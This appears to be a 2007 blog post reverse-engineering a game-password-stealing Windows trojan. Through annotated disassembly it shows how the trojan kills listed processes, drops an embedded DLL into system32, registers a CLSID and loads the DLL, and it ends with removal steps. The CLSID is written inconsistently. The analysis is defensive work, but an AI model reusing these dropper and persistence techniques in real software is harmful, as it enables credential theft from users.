[Malware] Reversing Trojan-PSW.Win32.OnLineGames.eos #1

October 15, 2007


Win32.OnLineGames is a very spreaded virus, that can be founded in many spam/Online Games WebSites, is not a dangerous virus but for OnlineGames can be a problem.

Win32.OnLineGames is a PSW Trojan, which works as Password Stealer, specifically written to rip online gaming passwords.

00401314                 add     eax, esi
00401316                 lea     eax, ds:401442h
0040131C                 jmp     eax ;00401442

At the entry point, code flow jumps to 00401442

00401442                 push    ebp
00401443                 mov     ebp, esp
00401445                 sub     esp, 52Ch
0040144B                 call    ds:GetCurrentThreadId
00401451                 push    eax
00401452                 call    ds:GetThreadDesktop
00401458                 test    eax, eax
0040145A                 jnz     short loc_40145D
0040145D                 push    ebx
0040145E                 push    esi
0040145F                 push    edi
00401460                 mov     edi, offset aCzxsderdaksiic ; "CZXSDERDAKSIICS_MX"
00401465                 xor     esi, esi
00401467                 push    edi ; String
00401468                 push    esi ; NULL
00401469                 push    EVENT_ALL_ACCESS
0040146E                 call    ds:OpenEventA

Obtains the handle to the desktop associated to the executable itself and opens the handle of an existing event called CZXSDERDAKSIICS_MX, if event exists its own handle is closed, else a new event (called CZXSDERDAKSIICS_MX9 is created with standard SecurityAttributes.

00401486                 mov     [ebp-10h], eax
00401489                 mov     edi, offset off_401154 ;Edi points to an array of strings,
 that are a list of executables
0040148E                 mov     ecx, [edi]
00401490                 call    sub_401798 ;Check if the searched process is running
00401495                 cmp     eax, esi
00401497                 jz      short loc_4014B2 ; If no, go to the next process
00401499                 push    eax
0040149A                 push    esi
0040149B                 push    1F0FFFh
004014A0                 call    ds:OpenProcess
004014A6                 cmp     eax, esi
004014A8                 jz      short loc_4014B2
004014AA                 push    esi
004014AB                 push    eax
004014AC                 call    ds:TerminateProcess
004014B2                 add     edi, 4
004014B5                 cmp     edi, offset dword_40115C ;Next process to search
004014BB                 jl      short loc_40148E
004014BD                 call    sub_40131E ;AdjustTokenPrivilege

The searched executables: Twister.exe, FilMsg.exe

0040151B                 call    ds:GetSystemDirectoryA
 00401521                 mov     edx, offset asc_401204 ; "\\"
 00401526                 lea     ecx, [ebp-11Ch] ;points to the System Directory
 0040152C                 call    sub_40174A
 00401531                 lea     edx, [ebp-11Ch]
 00401537                 lea     ecx, [ebp-428h]
 0040153D                 call    sub_40176F
 00401542                 push    esi
 00401543                 call    ds:GetModuleHandleA
 00401549                 push    offset aMndll   ; "MNDLL"
 0040154E                 push    65h
 00401550                 push    eax
 00401551                 mov     [ebp+8], eax
 00401554                 call    ds:FindResourceA
 0040155A                 push    eax                       ;00402048
 0040155B                 mov     [ebp-4], eax
 0040155E                 push    dword ptr [ebp+8]
 00401561                 call    ds:SizeofResource
 00401567                 push    dword ptr [ebp-4]
 0040156A                 mov     [ebp-18h], eax
 0040156D                 push    dword ptr [ebp+8]
 00401570                 call    ds:LoadResource
 00401576                 push    eax                   ;00402070
 00401577                 call    ds:LockResource
 0040157D                 cmp     eax, esi
 0040157F                 mov     [ebp-4], eax
 00401582                 jnz     short loc_40158E
 00401584                 push    dword ptr [ebp-10h]
 00401587                 call    edi ; CloseHandle
 00401589                 jmp     loc_4016C6

The code here is clear, after enstablishing the System Directory, searches for a Resource type “MNDLL” and next loads it, the LoadResource give us an intersing location 00402070, that’s an executable image, exploring this executable we can see some intersing strings hxxp://www.poptang.com/ekey.Bind ConfigAreaName game.ini

004015A6                 add     esp, 0Ch
 004015A9                 lea     edx, [ebp-428h]
 004015AF                 lea     ecx, [ebp-11Ch]
 004015B5                 call    ScansFor ;call    sub_40176F (searches for csavpw0.dll)
 004015BA                 lea     edx, [ebp-324h] ; SystemDirectory
 004015C0                 lea     ecx, [ebp-11Ch] ; csavpw0.dll
 004015C6                 call    sub_40174A
 004015CB                 lea     eax, [ebp-11Ch]
 004015D1                 push    eax
 004015D2                 call    ds:DeleteFileA
 004015D8                 push    esi
 004015D9                 push    80h
 004015DE                 push    2
 004015E0                 push    esi
 004015E1                 push    esi
 004015E2                 lea     eax, [ebp-11Ch]
 004015E8                 push    40000000h
 004015ED                 push    eax
 004015EE                 call    ds:CreateFileA
 004015F4                 cmp     eax, 0FFFFFFFFh
 004015F7                 mov     [ebp-14h], eax
 004015FA                 jnz     short loc_401605
 004015FC                 inc     dword ptr [ebp+8]
 004015FF                 cmp     dword ptr [ebp+8], 0Ah
 00401603                 jb      short loc_401591 ;Go to the next cycle

If there is another csavpw0.dll, is firstly deleted and next recreated, if creation fails is performed the same routine for csavpw1.dll, csavpw2.dll.

In my case csavpw2.dll is founded

00401608                 push    esi
 00401609                 push    ecx
 0040160A                 push    dword ptr [ebp-18h] ; Size: 4C00
 0040160D                 push    dword ptr [ebp-4] ; Buffer: 00402070
 00401610                 push    eax
 00401611                 call    ds:WriteFile
 0040161A                 call    CloseHandle
 0040161C                 push    ebx
 0040161D                 call    ds:Sleep
 00401623                 lea     ecx, [ebp-11Ch] ;C:\WINDOWS\system32\csavpw2.dll

csavpw2.dll is filled up with the Founded Resource.

00401630                 push    ebx
 00401631                 lea     eax, [ebp-220h]
 00401637                 push    offset aCzxsderdaksi_0 ; "CZXSDERDAKSIICS_%d"
 0040163C                 push    eax
 0040163D                 call    ds:wsprintfA
 00401643                 add     esp, 0Ch
 00401646                 lea     eax, [ebp-220h]
 0040164C                 push    eax ;CZXSDERDAKSIICS_0
 0040164D                 push    esi
 0040164E                 push    1F0003h
 00401653                 call    ds:OpenEventA
 00401659                 cmp     eax, esi
 0040165B                 jz      short loc_401666
 0040165D                 push    eax
 0040165E                 call     CloseHandle
 00401660                 inc     ebx
 00401661                 cmp     ebx, 0Ah
 00401664                 jb      short loc_401630

As usual it searches for CZXSDERDAKSIICS_0, CZXSDERDAKSIICS_1, CZXSDERDAKSIICS_2 when the OpenEvent FAILS we have this

0040166C                 push    104h
 00401671                 push    eax
 00401672                 push    esi
 00401673                 call    ds:GetModuleFileNameA
 00401679                 lea     eax, [ebp-220h]  ;CZXSDERDAKSIICS_2
 0040167F                 lea     edx, [ebp-52Ch] ;Path of our virus executable
 00401685                 push    eax                 ;CZXSDERDAKSIICS_2
 00401686                 lea     eax, [ebp-11Ch]
 0040168C                 push    eax                ;C:\WINDOWS\system32\csavpw2.dll
 0040168D                 mov     ecx, offset a8dfa290443ae89 ; "{8DFA2904-43AE-8929-9664-
 00401692                 call    sub_40124E

-> call sub_40124E Creates a RegKey in HKEY_CLASSES_ROOT with SubKey CLSID\{8DFA2904-97C43AE-8929-9664-4347554D24B6} and setted some values as “ExeModuleName“, “DllModuleName“, “SobjEventName

 004016B5                 push    eax           ; csavpw2.dll
 004016B6                 call    edi ; LoadLibraryA
 004016B8                 push    esi
 004016B9                 call    ds:ExitProcess
 004016BF                 push    eax
 004016C0                 call    ds:CloseHandle

.:: Trojan Removal ::.



1) Delete the Trojan file: csavpw0/1/2/etc.dll

1) Delete the following CLSID CLSID\{8DFA2904-97C43AE-8929-9664-4347554D24B6}


In the next we will see how csavpw0.dll works.


See you to the next post.. 🙂